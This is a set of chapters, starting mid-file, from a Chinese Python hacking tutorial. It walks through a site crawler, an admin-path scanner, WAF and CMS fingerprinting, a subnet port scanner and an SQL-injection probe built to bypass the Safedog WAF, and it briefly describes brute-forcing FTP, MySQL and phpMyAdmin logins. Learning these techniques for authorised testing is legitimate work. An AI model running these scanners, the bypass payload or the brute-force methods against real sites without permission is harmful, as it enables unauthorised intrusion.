| 9 | import time 10 | 11 | import platform 12 | 13 | import sys 14 | 15 | **00x2:** 16 | 17 | Random模块 #常用于随机数 18 | 19 | 随机生成 1-10中的其中一位:```random.randint(1,10)``` 20 | 21 | ![img](https://github.com/hackxc/Pyhacker/blob/master/books/img/15/1.png) 22 | 23 | 生成一个随机数:```random.random()``` 24 | 25 | ![img](https://github.com/hackxc/Pyhacker/blob/master/books/img/15/2.png) 26 | 27 | ``` 28 | listx = ['xc','www.hackxc.cc','bypass'] 29 | random.choice(listx) 30 | ``` 31 | 32 | 随机生成列表当中的一个值 33 | 34 | ![img](https://github.com/hackxc/Pyhacker/blob/master/books/img/15/3.png) 35 | 36 | ```listx = ['xc','www.hackxc.cc','bypass']``` 37 | 38 | 将序列listx中的元素顺序打乱:```random.shuffle(listx)``` 39 | 40 | ![img](https://github.com/hackxc/Pyhacker/blob/master/books/img/15/4.png) 41 | 42 | **00x3:** 43 | 44 | time模块 #常用于输出当前时间和延迟 45 | 46 | 当前时间戳:```time.time()``` 47 | 48 | ![img](https://github.com/hackxc/Pyhacker/blob/master/books/img/15/5.png) 49 | 50 | 程序延迟三秒:```time.sleep(3)``` 51 | 52 | ![img](https://github.com/hackxc/Pyhacker/blob/master/books/img/15/6.png) 53 | 54 | 输出本地时间:```time.localtime()``` 55 | 56 | ![img](https://github.com/hackxc/Pyhacker/blob/master/books/img/15/7.png) 57 | 58 | 格式化时间:```time.asctime(time.localtime())``` 59 | 60 | ![img](https://github.com/hackxc/Pyhacker/blob/master/books/img/15/8.png) 61 | 62 | 格式化输出当前日期时间: 63 | 64 | ```time.strftime("%Y-%m-%d %H:%M:%S", time.localtime())``` 65 | 66 | ![img](https://github.com/hackxc/Pyhacker/blob/master/books/img/15/9.png) 67 | 68 | **00x4:** 69 | 70 | platform模块 #获取本地系统信息 71 | 72 | ``` 73 | platform.name() #平台详细信息 74 | platform.machine() #平台架构 75 | platform.node() #主机名 76 | platform.platform() #操作系统 77 | platform.processor() #处理器 78 | platform.system() #系统类型 79 | 80 | 注:无法确定时返回为空 81 | ``` 82 | 83 | ![img](https://github.com/hackxc/Pyhacker/blob/master/books/img/15/10.png) 84 | 85 | **00x5:** 86 | 87 | sys模块 #常用于从程序外向程序内传递参数,以及退出程序 88 | 89 | 当前路径+文件名:```sys.argv[0]``` 90 | 91 | 传递的第一个参数:```sys.argv[1]``` 92 | 93 | 传递的第二个参数:```sys.argv[2]``` 94 | 95 | ![img](https://github.com/hackxc/Pyhacker/blob/master/books/img/15/11.png) 96 | 97 | 如果什么都不带则可传递多个参数:```sys.argv``` 98 | 99 | ![img](https://github.com/hackxc/Pyhacker/blob/master/books/img/15/12.png) 100 | 101 | 另一种传递多个参数的方法:```port = sys.argv[1:]``` 102 | 103 | ![img](https://github.com/hackxc/Pyhacker/blob/master/books/img/15/13.png) 104 | 105 | 退出程序:```sys.exit()``` 106 | 107 | ![img](https://github.com/hackxc/Pyhacker/blob/master/books/img/15/14.png) 108 | 109 | 加上退出提示信息:```sys.exit(“Error”)``` 110 | 111 | ![img](https://github.com/hackxc/Pyhacker/blob/master/books/img/15/15.png) 112 | 113 | 输出信息:```sys.stdout.write('\r%s'%x)``` 114 | 115 | 类似于print ,配合\r,每次输出指针回到初始位置 116 | 117 | ![img](https://github.com/hackxc/Pyhacker/blob/master/books/img/15/16.png) 118 | 119 | ![img](https://github.com/hackxc/Pyhacker/blob/master/books/img/15/17.png) 120 | 121 | 第一次输出1,第二次输出2,第三次输出3 122 | 123 | 每次输出指针都会回到最开始位置 124 | 125 | 126 | **00x6:** 127 | 128 | 到这里,本套课程就结束了,你还记得第一章Url采集嘛? 129 | 130 | 肯定会有小伙伴问怎么爆破端口,ftp,mysql等等 131 | 132 | 这边我简单说一下 133 | 134 | 例如**爆破ftp**,需要用到ftplib模块 135 | 136 | 利用异常处理模拟ftp登录,如果成功则返回true,否则返回false 137 | 138 | 例如爆破**mysql**,本地安装mysql 139 | 140 | 利用异常处理,cmd命令进行连接,原理同上 141 | 142 | 例如爆破**phpmyadmin** 143 | 144 | Phpmyadmin没有验证码的,我们只需要模拟post请求登录即可 145 | 146 | 既然你学完了本套课程,相信你可以自己写出来了,加油! 147 | -------------------------------------------------------------------------------- /books/0x2.md: -------------------------------------------------------------------------------- 1 | ## Pyhacker 之 网站爬虫 2 | 3 | **00x1:** 4 | 5 | 需要用到的模块如下: 6 | 7 | import requests 8 | 9 | import re 10 | 11 | **00x2:** 12 | 13 | 网站爬虫分类: 14 | 15 | 1.搜索引擎 inurl:hackxc.cc 16 | 17 | 2.正则匹配href内的url 18 | 19 | 3.目录扫描爬虫探测 20 | 21 | 4.爬取js,分析js内的url,爬取隐藏接口 22 | 23 | 5.更多的py爬虫模块 24 | 25 | **00x3:** 26 | 27 | 这里我们在前面实现了第一个功能,后面还有目录扫描,所以我们主要讲,第二个方法,其他都是大同小异 28 | 29 | 以www.hackxc.cc 为例 30 | 31 | 首先提取href内的url,遍历继续访问提取的url,反复如此 32 | 33 | ``` 34 | import urllib3 35 | urllib3.disable_warnings() 36 | req = requests.get(url,headers=headers,timeout=3,verify=False) 37 | ``` 38 | 39 | ![img](https://github.com/hackxc/Pyhacker/blob/master/books/img/2/1.png) 40 | 41 | href="http://www.hackxc.cc/?post=4" > 42 | 43 | 正则为:href=”(.*?)” 44 | 45 | ![img](https://github.com/hackxc/Pyhacker/blob/master/books/img/2/2.png) 46 | 47 | 没毛病,但是还有很多我们不想要的url 48 | 49 | 这里大家根据自己需求进行修改 50 | 51 | 比如,我只想要hackxc.cc 域名下的url,排除其他url 52 | 53 | ![img](https://github.com/hackxc/Pyhacker/blob/master/books/img/2/3.png) 54 | 55 | 当然不止是href内的url,还有src标签下的url 56 | 57 | 这里仅是抛砖引玉,原理同上 58 | 59 | 有重复项 60 | 61 | ![img](https://github.com/hackxc/Pyhacker/blob/master/books/img/2/4.png) 62 | 63 | 我们再来一个去重复 64 | 65 | ``` 66 | for url in urls: 67 | if 'hackxc.cc' in url: 68 | if url not in url_s: 69 | url_s.append(url) 70 | ``` 71 | 72 | 已去除 73 | 74 | ![img](https://github.com/hackxc/Pyhacker/blob/master/books/img/2/5.png) 75 | 76 | 当然这里还有css等文件,我们可以继续判断,剔除 77 | 78 | 也可以写个列表遍历判断剔除 79 | 80 | 简单处理一下 css 81 | 82 | ![img](https://github.com/hackxc/Pyhacker/blob/master/books/img/2/6.png) 83 | 84 | **00x4:** 85 | 86 | 接下来我们来遍历这个url_s 87 | 88 | 继续爬行 89 | 90 | ``` 91 | print u"开始第一轮采集" 92 | depth('http://www.hackxc.cc/?post=21') 93 | print u"采集到了%s url"%len(url_s) 94 | 95 | print u"开始执行第二次采集" 96 | for url in url_s: 97 | depth(url) 98 | print url 99 | 100 | print u"采集到了%s url"%len(url_s) 101 | 102 | print u"采集完成:%s"%url_s 103 | ``` 104 | 105 | **00x5:** 106 | 107 | 为了更加智能化,我们修改刚才设置的域名的地方 108 | 109 | ![img](https://github.com/hackxc/Pyhacker/blob/master/books/img/2/7.png) 110 | 111 | ![img](https://github.com/hackxc/Pyhacker/blob/master/books/img/2/8.png) 112 | 113 | ``` 114 | def main(): 115 | url =raw_input('\nurl:') 116 | #取域名部分 117 | r = url.split('.') 118 | who = r[-2]+"."+r[-1] 119 | if 'http' not in url: 120 | url = 'http://'+url 121 | depth(url,who) 122 | print u"开始第一轮采集,采集到了%s url"%len(url_s) 123 | 124 | print u"开始执行第二次采集" 125 | for url in url_s: 126 | depth(url,who) 127 | print url 128 | print u"采集到了%s url"%len(url_s) 129 | print u"采集完成:%s"%url_s 130 | ``` 131 | 132 | **00x6:** 133 | 134 | 循环深度爬行完善代码 135 | 136 | ``` 137 | def main(): 138 | url =raw_input('\nurl:') 139 | #取域名部分 140 | r = url.split('.') 141 | who = r[-2]+"."+r[-1] 142 | if 'http' not in url: 143 | url = 'http://'+url 144 | depth(url,who) 145 | print u"\n采集到了%s url"%len(url_s) 146 | 147 | while True: 148 | print u"\n开始执行深度采集" 149 | for url in url_s: 150 | if 'http' not in url: 151 | url = 'http://' + url 152 | depth(url,who) 153 | print url 154 | if len(url_s)==len(url_s): 155 | break 156 | ``` 157 | 158 | 现在我们来测试一下 159 | 160 | 首先我多加了两个url,他会爬去到/qc 161 | 162 | ![img](https://github.com/hackxc/Pyhacker/blob/master/books/img/2/9.png) 163 | 164 | 在/qc,我又加了一个url,看看他能不能爬去到 165 | 166 | ![img](https://github.com/hackxc/Pyhacker/blob/master/books/img/2/10.png) 167 | 168 | 看看他是不是可以一直深度爬取url 169 | 170 | 1. 171 | 172 | 先爬去tools.hackxc.cc 173 | 174 | 只有一个www.hackxc.cc 175 | 176 | 2. 177 | 178 | 接着从www.hackxc.cc 179 | 180 | 爬到tools.hackxc.cc/qc 181 | 182 | 3. 183 | 184 | 再从tools.hackxc.cc/qc 185 | 186 | 爬行到tools.hackxc.cc/test!!!!! 187 | 188 | ![img](https://github.com/hackxc/Pyhacker/blob/master/books/img/2/11.png) 189 | 190 | OK,一切正常 191 | 192 | **00x7:** 193 | 194 | 下面我们让他自动保存即可 195 | 196 | ``` 197 | with open('Url_depth.txt','a+')as f: 198 | for url in url_s: 199 | f.write(url+"\n") 200 | ``` 201 | 202 | **00x8:** 203 | 204 | 完整代码:/books/config/2.[Pyhacker]网站爬虫 205 | 206 | ``` 207 | #!/usr/bin/python 208 | #-*- coding:utf-8 -*- 209 | import requests 210 | import re 211 | import urllib3 212 | urllib3.disable_warnings() 213 | 214 | url_s = [] 215 | 216 | def depth(url,who): 217 | try: 218 | headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3314.0 Safari/537.36 SE 2.X MetaSr 1.0'} 219 | req = requests.get(url=url,headers=headers,timeout=3,verify=False) 220 | r = r'href="(.*?)"' 221 | urls = re.findall(r,req.content) 222 | for url in urls: 223 | if who in url: 224 | if url not in url_s: 225 | if 'css' not in url : 226 | url_s.append(url) 227 | except: 228 | pass 229 | 230 | def main(): 231 | url =raw_input('\nurl:') 232 | #取域名部分 233 | r = url.split('.') 234 | who = r[-2]+"."+r[-1] 235 | if 'http' not in url: 236 | url = 'http://'+url 237 | depth(url,who) 238 | print u"\n采集到了%s url"%len(url_s) 239 | 240 | while True: 241 | print u"\n开始执行深度采集" 242 | for url in url_s: 243 | if 'http' not in url: 244 | url = 'http://' + url 245 | depth(url,who) 246 | print url 247 | if len(url_s)==len(url_s): 248 | break 249 | 250 | if __name__ == '__main__': 251 | main() 252 | print u"\n采集完成" 253 | print u"\n采集到了%surl"%len(url_s) 254 | with open('Url_depth.txt','a+')as f: 255 | for url in url_s: 256 | f.write(url+"\n") 257 | print "\nSave the url_depth.txt!!!" 258 | ``` -------------------------------------------------------------------------------- /books/0x3.md: -------------------------------------------------------------------------------- 1 | ## Pyhacker 之 后台扫描器 2 | 3 | **00x1:** 4 | 5 | 需要用到的模块如下: 6 | 7 | import requests 8 | 9 | **00x2:** 10 | 11 | 基本模型: 12 | 13 | ``` 14 | import requests 15 | 16 | def dir(url): 17 | headers={'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3314.0 Safari/537.36 SE 2.X MetaSr 1.0'} 18 | req = requests.get(url=url,headers=headers) 19 | print req.status_code 20 | 21 | dir('http://www.hackxc.cc') 22 | ``` 23 | 24 | ![img](https://github.com/hackxc/Pyhacker/blob/master/books/img/3/1.png) 25 | 26 | **00x3:** 27 | 28 | 设置超时时间,以及忽略不信任证书 29 | 30 | ``` 31 | import urllib3 32 | urllib3.disable_warnings() 33 | req = requests.get(url=url,headers=headers,timeout=3,verify=False) 34 | ``` 35 | 36 | 再加个异常处理 37 | 38 | ![img](https://github.com/hackxc/Pyhacker/blob/master/books/img/3/2.png) 39 | 40 | 调试一下 41 | 42 | ![img](https://github.com/hackxc/Pyhacker/blob/master/books/img/3/3.png) 43 | 44 | 再进行改进,如果为200则输出 45 | 46 | ``` 47 | if req.status_code==200: 48 | print "[*]",req.url 49 | ``` 50 | 51 | **00x4:** 52 | 53 | 难免会碰到假的200页面,我们再处理一下 54 | 55 | 处理思路: 56 | 57 | 首先访问hackxchackxchackxc.php和xxxxxxxxxx记录下返回的页面的内容长度,然后在后来的扫描中,返回长度等于这个长度的判定为404 58 | 59 | ``` 60 | ef dirsearch(u,dir): 61 | try: 62 | headers = { 63 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3314.0 Safari/537.36 SE 2.X MetaSr 1.0'} 64 | #假的200页面进行处理 65 | hackxchackxchackxc = '/hackxchackxchackxc.php' 66 | hackxchackxchackxc_404 =requests.get(url=u+hackxchackxchackxc,headers=headers) 67 | # print len(hackxchackxchackxc_404.content) 68 | xxxxxxxxxxxx = '/xxxxxxxxxxxx' 69 | xxxxxxxxxxxx_404 = requests.get(url=u + xxxxxxxxxxxx, headers=headers) 70 | # print len(xxxxxxxxxxxx_404.content) 71 | 72 | #正常扫描 73 | req = requests.get(url=u+dir,headers=headers,timeout=3,verify=False) 74 | # print len(req.content) 75 | if req.status_code==200: 76 | if len(req.content)!=len(hackxchackxchackxc_404.content)and len(req.content)!= len(xxxxxxxxxxxx_404.content): 77 | print "[+]",req.url 78 | else: 79 | print u+dir,404 80 | except: 81 | pass 82 | ``` 83 | 84 | 很nice 85 | 86 | ![img](https://github.com/hackxc/Pyhacker/blob/master/books/img/3/4.png) 87 | 88 | **00x5:** 89 | 90 | 我们再让结果自动保存: 91 | 92 | ![img](https://github.com/hackxc/Pyhacker/blob/master/books/img/3/5.png) 93 | 94 | **00x6:** 95 | 96 | 完整代码:/books/config/3.[Pyhacker]后台扫描器 97 | 98 | ``` 99 | #!/usr/bin/python 100 | #-*- coding:utf-8 -*- 101 | import requests 102 | import urllib3 103 | urllib3.disable_warnings() 104 | 105 | urls = [] 106 | def dirsearch(u,dir): 107 | try: 108 | headers = { 109 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3314.0 Safari/537.36 SE 2.X MetaSr 1.0'} 110 | #假的200页面进行处理 111 | hackxchackxchackxc = '/hackxchackxchackxc.php' 112 | hackxchackxchackxc_404 =requests.get(url=u+hackxchackxchackxc,headers=headers) 113 | # print len(hackxchackxchackxc_404.content) 114 | xxxxxxxxxxxx = '/xxxxxxxxxxxx' 115 | xxxxxxxxxxxx_404 = requests.get(url=u + xxxxxxxxxxxx, headers=headers) 116 | # print len(xxxxxxxxxxxx_404.content) 117 | 118 | #正常扫描 119 | req = requests.get(url=u+dir,headers=headers,timeout=3,verify=False) 120 | # print len(req.content) 121 | if req.status_code==200: 122 | if len(req.content)!=len(hackxchackxchackxc_404.content)and len(req.content)!= len(xxxxxxxxxxxx_404.content): 123 | print "[+]",req.url 124 | with open('success_dir.txt','a+')as f: 125 | f.write(req.url+"\n") 126 | else: 127 | print u+dir,404 128 | else: 129 | print u + dir, 404 130 | except: 131 | pass 132 | 133 | if __name__ == '__main__': 134 | url = raw_input('\nurl:') 135 | print "" 136 | if 'http' not in url: 137 | url = 'http://'+url 138 | dirpath = open('rar.txt','r') 139 | for dir in dirpath.readlines(): 140 | dir = dir.strip() 141 | dirsearch(url,dir) 142 | ``` 143 | -------------------------------------------------------------------------------- /books/0x4.md: -------------------------------------------------------------------------------- 1 | ## Pyhacker 之 网站Waf探测 2 | 3 | **00x1:** 4 | 5 | 需要用到的模块如下: 6 | 7 | import requests 8 | 9 | **00x2:** 10 | 11 | 首先我们要了解WAF,寻找WAF的特征 12 | 13 | 比如安全狗,当访问不存在的页面 14 | 15 | ![img](https://github.com/hackxc/Pyhacker/blob/master/books/img/4/1.png) 16 | 17 | 寻找关键字:如safedog 18 | 19 | ![img](https://github.com/hackxc/Pyhacker/blob/master/books/img/4/2.png) 20 | 21 | **00x3:** 22 | 23 | ok,分析完毕,我们来测试一下 24 | 25 | ![img](https://github.com/hackxc/Pyhacker/blob/master/books/img/4/3.png) 26 | 27 | 没毛病,我们再去找一个waf,加入进去 28 | 29 | 以云锁为例,还是首先分析 30 | 31 | ![img](https://github.com/hackxc/Pyhacker/blob/master/books/img/4/4.png) 32 | 33 | 没有发现特别明显的特征 34 | 35 | 接着利用sql语句进行测试 36 | 37 | https://www.yunsuo.com.cn/%20and%201=1 38 | 39 | ![img](https://github.com/hackxc/Pyhacker/blob/master/books/img/4/5.png) 40 | 41 | 云锁竟然没用自己的产品... 42 | 43 | 那就以奇安信云防护为例,老规矩,查看源代码寻找特征 44 | 45 | ![img](https://github.com/hackxc/Pyhacker/blob/master/books/img/4/6.png) 46 | 47 | 这一块可以当做特征(eventID">eventID) 48 | 49 | 测试一下,莫得问题 50 | 51 | ![img](https://github.com/hackxc/Pyhacker/blob/master/books/img/4/7.png) 52 | 53 | **00x4:** 54 | 55 | 那我们还可以把特征,全部放入字典中,或者txt文本加载 56 | 57 | 这样可以方便收集waf,这里以txt为例 58 | 59 | Waf.txt内容为: 60 | 61 | ``` 62 | safedog|safedog 63 | eventID|qianxin 64 | yunsuo_session|yunsuo 65 | ``` 66 | 67 | ``` 68 | waf = [] 69 | def waflist(): 70 | file = open('waf.txt') 71 | for line in file: 72 | str = line.strip().split("|") #去除换行等字符,以|分割 73 | waf_data={} 74 | if len(str)==2: #判断是否属于waf格式 75 | waf_data['waf']=str[0] 76 | waf_data['name'] = str[1] 77 | waf.append(waf_data) 78 | 79 | waflist() 80 | print waf 81 | ``` 82 | 83 | ![img](https://github.com/hackxc/Pyhacker/blob/master/books/img/4/8.png) 84 | 85 | 方便调用: 86 | 87 | ![img](https://github.com/hackxc/Pyhacker/blob/master/books/img/4/9.png) 88 | 89 | 完善验证机制: 90 | 91 | ![img](https://github.com/hackxc/Pyhacker/blob/master/books/img/4/10.png) 92 | 93 | 请求 /and 1=1.php,触发waf 94 | 95 | ``` 96 | req = requests.get(url=u+'/and%201=1.php',headers=headers,verify=False,timeout=3) 97 | ``` 98 | 99 | **00x5:** 100 | 101 | 批量验证: 102 | 103 | ``` 104 | def main(): 105 | waflist() 106 | print u"\n加载waf完毕\n" 107 | f = open('url.txt','r') 108 | for url in f: 109 | url = url.strip() 110 | if 'http' not in url: 111 | u = 'http://' + url 112 | wafreq(u) 113 | ``` 114 | 115 | 带Waf网站自动导出 116 | 117 | ``` 118 | for ww in waf: 119 | if ww['waf'] in req.content: 120 | print "[+]",ww['name'],u 121 | f =open('Waf_url.txt','a+') 122 | f.write("[+]%s %s\n"%(ww['name'],u)) 123 | f.close() 124 | elif ww['waf'] in req.cookies: 125 | print "[+]",ww['name'],u 126 | f =open('Waf_url.txt','a+') 127 | f.write("[+]%s %s\n"%(ww['name'],u)) 128 | f.close() 129 | ``` 130 | 131 | **00x6:** 132 | 133 | 完整代码:/books/config/4.[Pyhacker]Waf探测 134 | 135 | ``` 136 | #!/usr/bin/python 137 | #-*- coding:utf-8 -*- 138 | import requests 139 | import urllib3 140 | urllib3.disable_warnings() 141 | 142 | waf = [] 143 | 144 | def waflist(): 145 | file = open('waf.txt') 146 | for line in file: 147 | str = line.strip().split("|") #去除换行等字符,以|分割 148 | waf_data={} 149 | if len(str)==2: #判断是否属于waf格式 150 | waf_data['waf']=str[0] 151 | waf_data['name'] = str[1] 152 | waf.append(waf_data) 153 | 154 | def wafreq(u): 155 | try: 156 | headers = { 157 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3314.0 Safari/537.36 SE 2.X MetaSr 1.0' 158 | } 159 | req = requests.get(url=u+'/and%201=1.php',headers=headers,verify=False,timeout=3) 160 | for ww in waf: 161 | if ww['waf'] in req.content: 162 | print "[+]",ww['name'],u 163 | f =open('Waf_url.txt','a+') 164 | f.write("[+]%s %s\n"%(ww['name'],u)) 165 | f.close() 166 | elif ww['waf'] in req.cookies: 167 | print "[+]",ww['name'],u 168 | f =open('Waf_url.txt','a+') 169 | f.write("[+]%s %s\n"%(ww['name'],u)) 170 | f.close() 171 | except: 172 | pass 173 | 174 | def main(): 175 | waflist() 176 | print u"\n加载waf完毕!\n" 177 | ff = open('url.txt','r') 178 | for url in ff: 179 | url = url.strip() 180 | if 'http' not in url: 181 | u = 'http://' + url 182 | wafreq(u) 183 | 184 | if __name__ == '__main__': 185 | main() 186 | ``` 187 | 188 | ## Pyhacker 之 编写Sqlmap Waf探测 189 | 190 | 以前,sqlmap 是专门有一个WAF的目录,来进行探测waf 191 | 192 | 命令:(已变成自动检测) 193 | ``` 194 | sqlmap.py -u “http://www.xxx.com” --identify-waf --batch 195 | ``` 196 | 197 | 到现在,sqlmap已经进行了修改,路径也变了 198 | 199 | C:\Python27\sqlmap\thirdparty\identywaf 200 | 201 | 我们只需要修改data.json里面的waf特征即可 202 | 203 | 如:safedog (607行) 204 | 205 | ![img](https://github.com/hackxc/Pyhacker/blob/master/books/img/4/11.png) 206 | 207 | ``` 208 | Company :哪家公司产品 209 | Name:waf名称 210 | regex:正则匹配 211 | ``` 212 | 213 | 那我们来进行修改,以刚才的奇安信为例 214 | 215 | ```"regex": "Server: eventID|493",``` 216 | 217 | ![img](https://github.com/hackxc/Pyhacker/blob/master/books/img/4/12.png) 218 | 219 | 原理: 220 | 221 | Sqlmap会自动执行sql语句 来触发waf,我们只需要写入特征 222 | 223 | 修改之前: 224 | 225 | ![img](https://github.com/hackxc/Pyhacker/blob/master/books/img/4/13.png) 226 | 227 | 修改之后: 228 | 229 | ![img](https://github.com/hackxc/Pyhacker/blob/master/books/img/4/14.png) -------------------------------------------------------------------------------- /books/0x5.md: -------------------------------------------------------------------------------- 1 | ## Pyhacker 之 网站Cms识别 2 | 3 | **00x1:** 4 | 5 | 需要用到的模块如下: 6 | 7 | import hashlib 8 | 9 | import requests 10 | 11 | **00x2:** 12 | 13 | 首先利用hashlib.md5().hexdigest()进行获取md5 14 | 15 | ``` 16 | r = hashlib.md5('cms.txt').hexdigest() 17 | print r 18 | ``` 19 | 20 | ![img](https://github.com/hackxc/Pyhacker/blob/master/books/img/5/1.png) 21 | 22 | 获取文件md5: 23 | 24 | ``` 25 | f = open('favicon.png','rb').read() 26 | filemd5 = hashlib.md5(f).hexdigest() 27 | print filemd5 28 | ``` 29 | 30 | ![img](https://github.com/hackxc/Pyhacker/blob/master/books/img/5/2.png) 31 | 32 | **00x3:** 33 | 34 | 获取网站文件的md5: 35 | 36 | ``` 37 | req=requests.get('http://www.hackxc.cc/content/templates/Adams/images/favicon.ico').content 38 | filemd5 = hashlib.md5(req).hexdigest() 39 | print filemd5 40 | ``` 41 | 42 | ![img](https://github.com/hackxc/Pyhacker/blob/master/books/img/5/3.png) 43 | 44 | **00x4:** 45 | 46 | 下面开始整理一下cms.txt 47 | 48 | ![img](https://github.com/hackxc/Pyhacker/blob/master/books/img/5/4.png) 49 | 50 | Cms字典处理: 51 | 52 | ``` 53 | data=[] 54 | def cmslist(): 55 | file = open("cms.txt") 56 | for line in file: 57 | str = line.strip().split("|") 58 | ls_data={} 59 | if len(str)==3:#判断是否为正确cms格式 60 | ls_data['url']=str[0] 61 | ls_data['name'] = str[1] 62 | ls_data['md5'] = str[2] 63 | data.append(ls_data) 64 | file.close( ) 65 | ``` 66 | 67 | 因为本身是一个字典形式的列表 68 | 69 | ![img](https://github.com/hackxc/Pyhacker/blob/master/books/img/5/5.png) 70 | 71 | 看下面这个图大家就懂了 72 | 73 | ![img](https://github.com/hackxc/Pyhacker/blob/master/books/img/5/6.png) 74 | 75 | **00x5:** 76 | 77 | 接着进行遍历cms列表 78 | 79 | ``` 80 | def cms(): 81 | for cms in data: 82 | try: 83 | req = requests.get('http://127.0.0.1%s'%cms['url']) 84 | print req.url 85 | except: 86 | pass 87 | if req.status_code == 200: 88 | filemd5 = hashlib.md5(req.content).hexdigest() 89 | if filemd5 == cms['md5']: 90 | print cms['name'] 91 | break 92 | ``` 93 | 94 | 简单调试:执行成功自动跳出循环 95 | 96 | ![img](https://github.com/hackxc/Pyhacker/blob/master/books/img/5/7.png) 97 | 98 | **00x6:** 99 | 100 | 完整代码:/books/config/5.[Pyhacker]Cms识别 101 | 102 | ``` 103 | #!/usr/bin/python 104 | #-*- coding:utf-8 -*- 105 | import requests 106 | import hashlib 107 | 108 | data=[] 109 | def cmslist(): 110 | file = open(r"cms.txt") 111 | for line in file: 112 | str = line.strip().split("|") 113 | ls_data={} 114 | if len(str)==3:#判断是否为正确cms格式 115 | ls_data['url']=str[0] 116 | ls_data['name'] = str[1] 117 | ls_data['md5'] = str[2] 118 | data.append(ls_data) 119 | file.close( ) 120 | 121 | def cms(url): 122 | headers = {'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3314.0 Safari/537.36 SE 2.X MetaSr 1.0'} 123 | for cms in data: 124 | urlx = url+cms['url'] 125 | try: 126 | req = requests.get(urlx,headers=headers,timeout=2) 127 | print urlx 128 | except: 129 | pass 130 | try: 131 | if req.status_code == 200: 132 | filemd5 = hashlib.md5(req.content).hexdigest() 133 | if filemd5 == cms['md5']: 134 | print '\n[*]cms:',cms['name'] 135 | break 136 | except: 137 | pass 138 | 139 | def main(): 140 | cmslist() 141 | url =raw_input("\nurl:") 142 | if url == "": 143 | sys.exit(1) 144 | print "" 145 | if 'http' not in url: 146 | url = 'http://'+url 147 | cms(url) 148 | 149 | if __name__ == '__main__': 150 | main() 151 | ``` 152 | 153 | **00x7:** 154 | 155 | 如果想对文件内多个url进行cms检测 156 | 157 | ``` 158 | def main(): 159 | cmslist() 160 | f = open('url.txt','r') 161 | for url in f: 162 | url = url.strip() 163 | if 'http' not in url: 164 | url = 'http://'+url 165 | cms(url) 166 | ``` -------------------------------------------------------------------------------- /books/0x6.md: -------------------------------------------------------------------------------- 1 | ## Pyhacker 之 端口扫描 2 | 3 | **00x1:** 4 | 5 | 需要用到的模块如下: 6 | 7 | import socket 8 | 9 | import ipaddr 10 | 11 | **00x2:** 12 | 13 | 首先我们来进行一个简单的通信 14 | 15 | 先创建socket对象 16 | 17 | ``` 18 | sockect = socket.socket() 19 | ``` 20 | 21 | 我们主要就是进行端口扫描,不需要等待对方回复通信,所以我们需要再用异常处理 22 | 23 | ![img](https://github.com/hackxc/Pyhacker/blob/master/books/img/6/1.png) 24 | 25 | Ok,没毛病 26 | 27 | **00x3:** 28 | 29 | 我们接下来处理ip,当输入一个 127.0.0.1/24 让他自动分成ip 30 | 31 | 这就要用到ipaddr 32 | 33 | ``` 34 | ip = raw_input('\nIP:') 35 | ips = ipaddr.IPNetwork(ip) 36 | for ip in ips: 37 | print ip 38 | ``` 39 | 40 | ![img](https://github.com/hackxc/Pyhacker/blob/master/books/img/6/2.png) 41 | 42 | 自动生成C段ok,当然你输入B段也是可以的,他会自动处理 43 | 44 | 强制转换为字符串,不然无法执行 45 | 46 | ```ip = str(ip)``` 47 | 48 | ![img](https://github.com/hackxc/Pyhacker/blob/master/books/img/6/3.png) 49 | 50 | **00x4:** 51 | 52 | 我们来测试一下,以百度为例: 53 | 54 | ![img](https://github.com/hackxc/Pyhacker/blob/master/books/img/6/4.png) 55 | 56 | 速度有点慢,有的可能会超时,我们再限制一下超时时间 57 | 58 | ``` 59 | try: 60 | sockect.settimeout(0.2) 61 | sockect.connect((ip,port)) 62 | print "\n[+]%s open %s"%(ip,port) 63 | except: 64 | sockect.close() 65 | ``` 66 | 67 | 修改后快了很多 68 | 69 | ![img](https://github.com/hackxc/Pyhacker/blob/master/books/img/6/5.png) 70 | 71 | **00x5:** 72 | 73 | 我们来设定扫描的端口 74 | 75 | ```portlist = [21,80,445,3306,27017,6379.139,135]``` 76 | 77 | ![img](https://github.com/hackxc/Pyhacker/blob/master/books/img/6/6.png) 78 | 79 | ok,这就完成了一个端口扫描器 80 | 81 | 当然你可以自定义端口,以及根据自己的需求来编写 82 | 83 | **00x6:** 84 | 85 | 完整代码:/books/config/6.[Pyhacker]端口扫描 86 | 87 | ``` 88 | #!/usr/bin/python 89 | #-*- coding:utf-8 -*- 90 | import socket 91 | import ipaddr 92 | 93 | def portscan(ip,port): 94 | sockect = socket.socket() 95 | try: 96 | sockect.settimeout(0.2) 97 | sockect.connect((ip,port)) 98 | print "[+]%s open %s"%(ip,port) 99 | except: 100 | sockect.close() 101 | 102 | portlist = [21,80,443,445,3306,27017,6379] 103 | if __name__ == '__main__': 104 | ip = raw_input('\nIP:') 105 | print "" 106 | ips = ipaddr.IPNetwork(ip) 107 | for ip in ips: 108 | for port in portlist: 109 | portscan(str(ip),port) 110 | ``` -------------------------------------------------------------------------------- /books/0x7.md: -------------------------------------------------------------------------------- 1 | ## Pyhacker 之 Sql脚本编写 2 | 3 | **00x1:** 4 | 5 | 需要用到的模块如下: 6 | 7 | import requests 8 | 9 | import re 10 | 11 | **00x2:** 12 | 13 | 编写Sql判断 14 | 15 | 首先我们需要一个payload,最好可以bypass,这样方便测试 16 | 17 | ?a=/*&id=1%20and%201=1%23*/ 18 | 19 | 这里以bypass 安全狗为例 20 | 21 | 相关文章:http://www.hackxc.cc/hkjs/301.html 22 | 23 | ``` 24 | url = 'http://127.0.0.1/index.php?id=1' 25 | r = r'\?(.*)' 26 | id = re.findall(r,url) 27 | id = id[0] 28 | payload = "?a=/*&{}%20and%201=1%23*/".format(id) 29 | ``` 30 | 31 | ![img](https://github.com/hackxc/Pyhacker/blob/master/books/img/7/1.png) 32 | 33 | Ok,可以正常输出 34 | 35 | 再匹配前面的url + payload完美bypass 36 | 37 | 